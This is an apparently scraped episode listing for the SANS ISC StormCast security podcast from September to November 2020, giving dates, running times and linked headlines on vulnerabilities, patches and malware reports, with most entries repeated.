Quick Status of the CAA DNS Record Adoption https://isc.sans.edu/forums/diary/Quick+Status+of+the+CAA+DNS+Record+Adoption/26738/ Windows Kernel cng.sys pool-based buffer overflow CVE-2020-17087 https://bugs.chromium.org/p/project-zero/issues/detail?id=2104 Operation Earth Kitsune https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations
11/2/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, October 30th 2020

PATCH NOW: CVE-2020-14882 WebLogic Actively Exploited https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/ Zonealarm Update https://www.zonealarm.com/software/extreme-security/release-history Ransomware Targeting Healthcare https://us-cert.cisa.gov/ncas/alerts/aa20-302a OpenEMR Vulnerabilities https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability Mishka McCowan: Mitigating Risk with the CSA 12 Critical Risks for Serverless Applications https://www.sans.org/reading-room/whitepapers/cloud/mitigating-risk-csa-12-critical-risks-serverless-applications-39845
10/30/202014 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, October 30th 2020

PATCH NOW: CVE-2020-14882 WebLogic Actively Exploited https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/ Zonealarm Update https://www.zonealarm.com/software/extreme-security/release-history Ransomware Targeting Healthcare https://us-cert.cisa.gov/ncas/alerts/aa20-302a OpenEMR Vulnerabilities https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability Mishka McCowan: Mitigating Risk with the CSA 12 Critical Risks for Serverless Applications https://www.sans.org/reading-room/whitepapers/cloud/mitigating-risk-csa-12-critical-risks-serverless-applications-39845
10/30/202014 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, October 29th 2020

SMBGhost Remains Unpatched on 8% of Exposed SMB Servers https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/ Microsoft Defender ATP Cobalt Strike False Positive https://twitter.com/ffforward/status/1321375690084810753?s=20 QNAP Security Advisory https://www.qnap.com/en/security-advisory/QSA-20-09 New Linux Trickbot Version Sighted https://www.netscout.com/blog/asert/dropping-anchor Abuse.ch Needs Help https://abuse.ch/blog/moving-forward/
10/29/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, October 29th 2020

SMBGhost Remains Unpatched on 8% of Exposed SMB Servers https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/ Microsoft Defender ATP Cobalt Strike False Positive https://twitter.com/ffforward/status/1321375690084810753?s=20 QNAP Security Advisory https://www.qnap.com/en/security-advisory/QSA-20-09 New Linux Trickbot Version Sighted https://www.netscout.com/blog/asert/dropping-anchor Abuse.ch Needs Help https://abuse.ch/blog/moving-forward/
10/29/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, October 28th 2020

Vulnerable SonarQube Configurations Used to Steal Code https://beta.documentcloud.org/documents/20399900-fbi_flash_sonarqube_access_bc Microsoft Edge Security Updates (Chromium-Based) https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002 Microsoft Releases Flash Removal Tool https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player Bypassing MSFT Teams Policies https://o365blog.com/post/teams-policies/
10/28/20205 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, October 28th 2020

Vulnerable SonarQube Configurations Used to Steal Code https://beta.documentcloud.org/documents/20399900-fbi_flash_sonarqube_access_bc Microsoft Edge Security Updates (Chromium-Based) https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002 Microsoft Releases Flash Removal Tool https://support.microsoft.com/en-us/help/4577586/update-for-removal-of-adobe-flash-player Bypassing MSFT Teams Policies https://o365blog.com/post/teams-policies/
10/28/20205 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, October 27th 2020

Excel 4 Macros: "Abnormal Sheet Visibility" https://isc.sans.edu/forums/diary/Excel+4+Macros+Abnormal+Sheet+Visibility/26726/ HP Printer Applications Certificate Revoked https://eclecticlight.co/2020/10/23/why-have-my-hp-printers-stopped-working-how-to-check-their-software-signature/ Link Previews and Privacy https://www.mysk.blog/2020/10/25/link-previews/
10/27/20206 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, October 27th 2020

Excel 4 Macros: "Abnormal Sheet Visibility" https://isc.sans.edu/forums/diary/Excel+4+Macros+Abnormal+Sheet+Visibility/26726/ HP Printer Applications Certificate Revoked https://eclecticlight.co/2020/10/23/why-have-my-hp-printers-stopped-working-how-to-check-their-software-signature/ Link Previews and Privacy https://www.mysk.blog/2020/10/25/link-previews/
10/27/20206 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, October 26th 2020

An Alternative to Shodan: Censys https://isc.sans.edu/forums/diary/An+Alternative+to+Shodan+Censys+with+UserAgent+CensysInspect11/26718/ Sooty: SOC Analyst's All-in-One Tool https://isc.sans.edu/forums/diary/Sooty+SOC+Analysts+AllinOne+Tool/26714/ Adversarial ML Threat Matrix https://github.com/mitre/advmlthreatmatrix Samsung S20 RCE https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/ VMWare Advisory https://www.vmware.com/security/advisories/VMSA-2020-0023.html
10/26/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, October 26th 2020

An Alternative to Shodan: Censys https://isc.sans.edu/forums/diary/An+Alternative+to+Shodan+Censys+with+UserAgent+CensysInspect11/26718/ Sooty: SOC Analyst's All-in-One Tool https://isc.sans.edu/forums/diary/Sooty+SOC+Analysts+AllinOne+Tool/26714/ Adversarial ML Threat Matrix https://github.com/mitre/advmlthreatmatrix Samsung S20 RCE https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/ VMWare Advisory https://www.vmware.com/security/advisories/VMSA-2020-0023.html
10/26/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, October 23rd 2020

BazarLoader Phishing Lures https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/ Stalled Reviews for Secure Boot Shim https://github.com/rhboot/shim-review/issues/120 https://github.com/rhboot/shim-review/issues/102#issuecomment-698963751 Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
10/23/20205 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, October 23rd 2020

BazarLoader Phishing Lures https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/ Stalled Reviews for Secure Boot Shim https://github.com/rhboot/shim-review/issues/120 https://github.com/rhboot/shim-review/issues/102#issuecomment-698963751 Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
10/23/20205 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, October 22nd 2020

Shipping Dangerous Goods https://isc.sans.edu/forums/diary/Shipping+dangerous+goods/26702/ Chinese State-Sponsored Actors Exploit Same Vulnerablities as Others https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF URL Bar Spoofing Vulnerabilities https://thehackernews.com/2020/10/browser-address-spoofing-vulnerability.html Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2020.html
10/22/20205 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, October 22nd 2020

Shipping Dangerous Goods https://isc.sans.edu/forums/diary/Shipping+dangerous+goods/26702/ Chinese State-Sponsored Actors Exploit Same Vulnerablities as Others https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF URL Bar Spoofing Vulnerabilities https://thehackernews.com/2020/10/browser-address-spoofing-vulnerability.html Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2020.html
10/22/20205 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, October 21st 2020

Mirai-alike Python Scanner https://isc.sans.edu/forums/diary/Miraialike+Python+Scanner/26698/ Google Chrome Update (actively exploited vulnerability fixed) https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html QNAP Fixes ZeroLogon Vulnerability https://www.qnap.com/en/security-advisory/qsa-20-07 GravityRat Going Multi Platform https://usa.kaspersky.com/about/press-releases/2020_infamous-gravity-rat-spyware-evolves-to-target-multiple-platforms US Census Spoof https://beta.documentcloud.org/documents/20397864-fbi-flash-unattributed-entities-register-domains-10142020
10/21/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, October 21st 2020

Mirai-alike Python Scanner https://isc.sans.edu/forums/diary/Miraialike+Python+Scanner/26698/ Google Chrome Update (actively exploited vulnerability fixed) https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html QNAP Fixes ZeroLogon Vulnerability https://www.qnap.com/en/security-advisory/qsa-20-07 GravityRat Going Multi Platform https://usa.kaspersky.com/about/press-releases/2020_infamous-gravity-rat-spyware-evolves-to-target-multiple-platforms US Census Spoof https://beta.documentcloud.org/documents/20397864-fbi-flash-unattributed-entities-register-domains-10142020
10/21/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, October 20th 2020

Out of Band MSFT Patches https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17022 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17023 Adobe Magento Patches https://helpx.adobe.com/security/products/magento/apsb20-59.html Attacks against SS7 https://www.haaretz.com/israel-news/tech-news/.premium-exclusive-intricate-hack-against-israeli-crypto-execs-mossad-investigating-1.9211991 https://www.bleepingcomputer.com/news/security/hackers-hijack-telegram-email-accounts-in-ss7-mobile-attack/
10/20/20205 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, October 20th 2020

Out of Band MSFT Patches https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17022 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17023 Adobe Magento Patches https://helpx.adobe.com/security/products/magento/apsb20-59.html Attacks against SS7 https://www.haaretz.com/israel-news/tech-news/.premium-exclusive-intricate-hack-against-israeli-crypto-execs-mossad-investigating-1.9211991 https://www.bleepingcomputer.com/news/security/hackers-hijack-telegram-email-accounts-in-ss7-mobile-attack/
10/20/20205 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, October 19th 2020

CVE-2020-5135 SonicWall Buffer Overflow https://isc.sans.edu/forums/diary/CVE20205135+Buffer+Overflow+in+SonicWall+VPNs+Patch+Now/26692/ Spammer Attached Mass Mailer Configuration Instead of Malware https://isc.sans.edu/forums/diary/File+Selection+Gaffe/26694/ Traffic Analysis Quiz: Ugly-Wolf.net https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+UglyWolfnet/26688/ Qualcomm QCMAP Vulnerabilities https://www.vdoo.com/blog/qualcomm-qcmap-vulnerabilities Discord Desktop App RCE https://mksben.l0.cm/2020/10/discord-desktop-rce.html
10/19/20206 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, October 19th 2020

CVE-2020-5135 SonicWall Buffer Overflow https://isc.sans.edu/forums/diary/CVE20205135+Buffer+Overflow+in+SonicWall+VPNs+Patch+Now/26692/ Spammer Attached Mass Mailer Configuration Instead of Malware https://isc.sans.edu/forums/diary/File+Selection+Gaffe/26694/ Traffic Analysis Quiz: Ugly-Wolf.net https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+UglyWolfnet/26688/ Qualcomm QCMAP Vulnerabilities https://www.vdoo.com/blog/qualcomm-qcmap-vulnerabilities Discord Desktop App RCE https://mksben.l0.cm/2020/10/discord-desktop-rce.html
10/19/20206 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, October 16th 2020

Obfuscated Python RAT https://isc.sans.edu/forums/diary/Nicely+Obfuscated+Python+RAT/26680/ BadNeighbor ICMPv6 Router Advertisement Update https://isc.sans.edu/forums/diary/CVE202016898+Windows+ICMPv6+Router+Advertisement+RRDNS+Option+Remote+Code+Execution+Vulnerability/26684/ BlueZ Vulnerability https://www.youtube.com/watch?v=qPYrLRausSw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00435.html https://security.googleblog.com/ (available "soon") Zoom Rolling Out End-to-End Encryption https://blog.zoom.us/zoom-rolling-out-end-to-end-encryption-offering/
10/16/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, October 16th 2020

Obfuscated Python RAT https://isc.sans.edu/forums/diary/Nicely+Obfuscated+Python+RAT/26680/ BadNeighbor ICMPv6 Router Advertisement Update https://isc.sans.edu/forums/diary/CVE202016898+Windows+ICMPv6+Router+Advertisement+RRDNS+Option+Remote+Code+Execution+Vulnerability/26684/ BlueZ Vulnerability https://www.youtube.com/watch?v=qPYrLRausSw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00435.html https://security.googleblog.com/ (available "soon") Zoom Rolling Out End-to-End Encryption https://blog.zoom.us/zoom-rolling-out-end-to-end-encryption-offering/
10/16/20205 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, October 15th 2020

TA551/Shathak Word Docs Push IcedID and Bokbot https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674/ MSFT Patch Tuesday Followup https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 Apple T2 Chip Vulnerability Confirmed https://9to5mac.com/2020/10/13/t2-exploit-team/ SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
10/15/20206 minutes
Episode Artwork

ISC StormCast for Thursday, October 15th 2020

TA551/Shathak Word Docs Push IcedID and Bokbot https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674/ MSFT Patch Tuesday Followup https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 Apple T2 Chip Vulnerability Confirmed https://9to5mac.com/2020/10/13/t2-exploit-team/ SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
10/15/20206 minutes
Episode Artwork

ISC StormCast for Wednesday, October 14th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2020+Patch+Tuesday/26672/ Adobe Updates https://helpx.adobe.com/security/products/flash-player/apsb20-58.html
10/14/20206 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, October 14th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2020+Patch+Tuesday/26672/ Adobe Updates https://helpx.adobe.com/security/products/flash-player/apsb20-58.html
10/14/20206 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, October 13th 2020

Nested .MSGs: Turtles All The Way Down https://isc.sans.edu/forums/diary/Nested+MSGs+Turtles+All+The+Way+Down/26668/ Microsoft Attempting To Take Down Trickbot C2 Infrastructure https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/ Google Chrome Cache Partitioning https://developers.google.com/web/updates/2020/10/http-cache-partitioning
10/13/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, October 13th 2020

Nested .MSGs: Turtles All The Way Down https://isc.sans.edu/forums/diary/Nested+MSGs+Turtles+All+The+Way+Down/26668/ Microsoft Attempting To Take Down Trickbot C2 Infrastructure https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/ Google Chrome Cache Partitioning https://developers.google.com/web/updates/2020/10/http-cache-partitioning
10/13/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, October 12th 2020

Phishing Kits As Far As The Eye Can See https://isc.sans.edu/forums/diary/Phishing+kits+as+far+as+the+eye+can+see/26660/ Open Packaging Conventions https://isc.sans.edu/forums/diary/Open+Packaging+Conventions/26662/ Analyzing MSG Files https://isc.sans.edu/forums/diary/Analyzing+MSG+Files+With+pluginmsgsummary/26664/ Cisco Video Surveillance 8000 Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cdp-rcedos-mAHR8vNx 55 New Apple Flaws https://samcurry.net/hacking-apple/
10/12/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, October 12th 2020

Phishing Kits As Far As The Eye Can See https://isc.sans.edu/forums/diary/Phishing+kits+as+far+as+the+eye+can+see/26660/ Open Packaging Conventions https://isc.sans.edu/forums/diary/Open+Packaging+Conventions/26662/ Analyzing MSG Files https://isc.sans.edu/forums/diary/Analyzing+MSG+Files+With+pluginmsgsummary/26664/ Cisco Video Surveillance 8000 Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cdp-rcedos-mAHR8vNx 55 New Apple Flaws https://samcurry.net/hacking-apple/
10/12/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, October 9th 2020

Hashicorp Vault Vulnerabilities https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-hashicorp-vault.html Ryuk Ransomware Writeup https://thedfirreport.com/2020/10/08/ryuks-return/ Ricky Tan: Zeek Log Reconnaissance with Netowrk Graphs Using Maltego Casefile https://www.sans.org/reading-room/whitepapers/securityanalytics/zeek-log-reconnaissance-network-graphs-maltego-casefile-39815
10/9/202019 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, October 9th 2020

Hashicorp Vault Vulnerabilities https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-hashicorp-vault.html Ryuk Ransomware Writeup https://thedfirreport.com/2020/10/08/ryuks-return/ Ricky Tan: Zeek Log Reconnaissance with Netowrk Graphs Using Maltego Casefile https://www.sans.org/reading-room/whitepapers/securityanalytics/zeek-log-reconnaissance-network-graphs-maltego-casefile-39815
10/9/202019 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, October 8th 2020

Today, Nobody is Going to Attack You https://isc.sans.edu/forums/diary/Today+Nobody+is+Going+to+Attack+You/26654/ Google Chrome Patches https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop.html Android Security Update https://source.android.com/security/bulletin/2020-10-01 QNAP Patches Helpdesk Application https://www.qnap.com/en/security-advisory/QSA-20-08 Comcast Remote Control Evesdropping https://www.guardicore.com/2020/10/wareztheremote-turning-remotes-into-listening-devices/
10/8/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, October 8th 2020

Today, Nobody is Going to Attack You https://isc.sans.edu/forums/diary/Today+Nobody+is+Going+to+Attack+You/26654/ Google Chrome Patches https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop.html Android Security Update https://source.android.com/security/bulletin/2020-10-01 QNAP Patches Helpdesk Application https://www.qnap.com/en/security-advisory/QSA-20-08 Comcast Remote Control Evesdropping https://www.guardicore.com/2020/10/wareztheremote-turning-remotes-into-listening-devices/
10/8/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, October 7th 2020

Apple T2 Chip Vulnerability https://ironpeak.be/blog/crouching-t2-hidden-danger/ NVIDIA Patches https://nvidia.custhelp.com/app/answers/detail/a_id/5075 Cloudflare DDoS Alerts https://blog.cloudflare.com/announcing-ddos-alerts/ Gravatar Privacy Issue https://www.bleepingcomputer.com/news/security/online-avatar-service-gravatar-allows-mass-collection-of-user-info/
10/7/20208 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, October 7th 2020

Apple T2 Chip Vulnerability https://ironpeak.be/blog/crouching-t2-hidden-danger/ NVIDIA Patches https://nvidia.custhelp.com/app/answers/detail/a_id/5075 Cloudflare DDoS Alerts https://blog.cloudflare.com/announcing-ddos-alerts/ Gravatar Privacy Issue https://www.bleepingcomputer.com/news/security/online-avatar-service-gravatar-allows-mass-collection-of-user-info/
10/7/20208 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, October 6th 2020

Obfuscation and Repetition https://isc.sans.edu/forums/diary/Obfuscation+and+Repetition/26648/ Compromised UEFI Payload Found https://securelist.com/mosaicregressor/98849/ Privilege Escalation Flaw in All AntiVirus Products https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower Rapid7 SMTP "NICER" Report https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/
10/6/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, October 6th 2020

Obfuscation and Repetition https://isc.sans.edu/forums/diary/Obfuscation+and+Repetition/26648/ Compromised UEFI Payload Found https://securelist.com/mosaicregressor/98849/ Privilege Escalation Flaw in All AntiVirus Products https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower Rapid7 SMTP "NICER" Report https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/
10/6/20205 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, October 5th 2020

Analysis of a Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Phishing+Kit/26634/ Hoaxcalls Botnet Scanning for Huawei Home Gateway https://isc.sans.edu/forums/diary/Scanning+for+SOHO+Routers/26638/ SQL Server Cumulative Update 8 https://support.microsoft.com/en-us/help/4577194/cumulative-update-8-for-sql-server-2019 Telstra Accidentially Reroutes Proton Mail Traffic https://protonmail.com/blog/bgp-hijacking-september-2020/ "Raccine" Ransomware Vaccine https://github.com/Neo23x0/Raccine
10/5/20206 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, October 5th 2020

Analysis of a Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Phishing+Kit/26634/ Hoaxcalls Botnet Scanning for Huawei Home Gateway https://isc.sans.edu/forums/diary/Scanning+for+SOHO+Routers/26638/ SQL Server Cumulative Update 8 https://support.microsoft.com/en-us/help/4577194/cumulative-update-8-for-sql-server-2019 Telstra Accidentially Reroutes Proton Mail Traffic https://protonmail.com/blog/bgp-hijacking-september-2020/ "Raccine" Ransomware Vaccine https://github.com/Neo23x0/Raccine
10/5/20206 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, October 2nd 2020

Making Sensor of Azure AD Activity Logs https://isc.sans.edu/forums/diary/Making+sense+of+Azure+AD+AAD+activity+logs/26626/ IOCs Turning into IOOIs https://isc.sans.edu/forums/diary/IOCs+turning+into+IOOIs/26624/ Apple Security Patch Pulled https://mrmacintosh.com/mojave-2020-005-security-update-causing-major-problems-updated Have I Been EMOTET Service https://www.haveibeenemotet.com/
10/2/20205 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, October 2nd 2020

Making Sensor of Azure AD Activity Logs https://isc.sans.edu/forums/diary/Making+sense+of+Azure+AD+AAD+activity+logs/26626/ IOCs Turning into IOOIs https://isc.sans.edu/forums/diary/IOCs+turning+into+IOOIs/26624/ Apple Security Patch Pulled https://mrmacintosh.com/mojave-2020-005-security-update-causing-major-problems-updated Have I Been EMOTET Service https://www.haveibeenemotet.com/
10/2/20205 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, October 1st 2020

Scans for FPURL.xml: Reconnaissance or Not? https://isc.sans.edu/forums/diary/Scans+for+FPURLxml+Reconnaissance+or+Not/26622/ HP Device Manager Backdoor https://support.hp.com/us-en/document/c06921908 https://www.theregister.com/2020/09/30/hp_device_manager_backdoor_database_account/ KensingtonWorks RCE https://robertheaton.com/another-rce-in-kensingtonworks/
10/1/20206 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, October 1st 2020

Scans for FPURL.xml: Reconnaissance or Not? https://isc.sans.edu/forums/diary/Scans+for+FPURLxml+Reconnaissance+or+Not/26622/ HP Device Manager Backdoor https://support.hp.com/us-en/document/c06921908 https://www.theregister.com/2020/09/30/hp_device_manager_backdoor_database_account/ KensingtonWorks RCE https://robertheaton.com/another-rce-in-kensingtonworks/
10/1/20206 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, September 30th 2020

Managing Remote Access for Contractors and Partners https://isc.sans.edu/forums/diary/Managing+Remote+Access+for+Partners+Contractors/26614/#comments Updated Windows ZeroLogon Advisory https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc Cisco Patching Exploited DoS Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz FoxIT PDF Reader Update https://www.foxitsoftware.com/support/security-bulletins.html
9/30/20204 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, September 30th 2020

Managing Remote Access for Contractors and Partners https://isc.sans.edu/forums/diary/Managing+Remote+Access+for+Partners+Contractors/26614/#comments Updated Windows ZeroLogon Advisory https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc Cisco Patching Exploited DoS Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz FoxIT PDF Reader Update https://www.foxitsoftware.com/support/security-bulletins.html
9/30/20204 minutes, 58 seconds
Episode Artwork

ISC StormCast for Tuesday, September 29th 2020

Some Tyler Technologies Customers Targeted after Breach https://isc.sans.edu/forums/diary/Some+Tyler+Technologies+Customers+Targeted+with+The+Installation+of+a+Bomgar+Client/26610/ Obfuscated PowerShell Backdoor https://isc.sans.edu/forums/diary/PowerShell+Backdoor+Launched+from+a+ShellCode/26602/ QNAP Fixes AgeLocker Vulnerability in Photo Station https://www.qnap.com/de-de/security-advisory/qsa-20-06 TrendMicro Apex One Vulnerablity https://success.trendmicro.com/product-support/apex-one
9/29/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, September 29th 2020

Some Tyler Technologies Customers Targeted after Breach https://isc.sans.edu/forums/diary/Some+Tyler+Technologies+Customers+Targeted+with+The+Installation+of+a+Bomgar+Client/26610/ Obfuscated PowerShell Backdoor https://isc.sans.edu/forums/diary/PowerShell+Backdoor+Launched+from+a+ShellCode/26602/ QNAP Fixes AgeLocker Vulnerability in Photo Station https://www.qnap.com/de-de/security-advisory/qsa-20-06 TrendMicro Apex One Vulnerablity https://success.trendmicro.com/product-support/apex-one
9/29/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, September 28th 2020

Securing Exchange Online https://isc.sans.edu/forums/diary/Securing+Exchange+Online+Guest+Diary/26600/ Decoding Corrupt BASE64 https://isc.sans.edu/forums/diary/Decoding+Corrupt+BASE64+Strings/26606/ Fortinet VPN Default Setting Problem https://securingsam.com/breaching-the-fort/ Single Use Credit Cards Numbers https://www.helpnetsecurity.com/2020/09/25/privacy-cards/
9/28/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, September 28th 2020

Securing Exchange Online https://isc.sans.edu/forums/diary/Securing+Exchange+Online+Guest+Diary/26600/ Decoding Corrupt BASE64 https://isc.sans.edu/forums/diary/Decoding+Corrupt+BASE64+Strings/26606/ Fortinet VPN Default Setting Problem https://securingsam.com/breaching-the-fort/ Single Use Credit Cards Numbers https://www.helpnetsecurity.com/2020/09/25/privacy-cards/
9/28/20205 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, September 25th 2020

Party in Ibiza with PowerShell https://isc.sans.edu/forums/diary/Party+in+Ibiza+with+PowerShell/26594/ Microsoft Tracking Zerologon Exploits https://twitter.com/MsftSecIntel/status/1308941504707063808 Apple Patches https://support.apple.com/en-us/HT201222 Instagram for Android Vulnerability https://blog.checkpoint.com/2020/09/24/instahack-how-researchers-were-able-to-take-over-the-instagram-app-using-a-malicious-image/
9/25/20206 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, September 25th 2020

Party in Ibiza with PowerShell https://isc.sans.edu/forums/diary/Party+in+Ibiza+with+PowerShell/26594/ Microsoft Tracking Zerologon Exploits https://twitter.com/MsftSecIntel/status/1308941504707063808 Apple Patches https://support.apple.com/en-us/HT201222 Instagram for Android Vulnerability https://blog.checkpoint.com/2020/09/24/instahack-how-researchers-were-able-to-take-over-the-instagram-app-using-a-malicious-image/
9/25/20206 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, September 24th 2020

Dynamic Malicious Word Document https://isc.sans.edu/forums/diary/Malicious+Word+Document+with+Dynamic+Content/26590/ Old Versions of SAMBA Affected by ZeroLogon Vulnerability https://www.samba.org/samba/security/CVE-2020-1472.html Google Chrome Update https://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html QNAP Devices hit by AgeLocker Ransomware https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets-qnap-nas-devices-steals-data/
9/24/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, September 24th 2020

Dynamic Malicious Word Document https://isc.sans.edu/forums/diary/Malicious+Word+Document+with+Dynamic+Content/26590/ Old Versions of SAMBA Affected by ZeroLogon Vulnerability https://www.samba.org/samba/security/CVE-2020-1472.html Google Chrome Update https://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html QNAP Devices hit by AgeLocker Ransomware https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets-qnap-nas-devices-steals-data/
9/24/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, September 23rd 2020

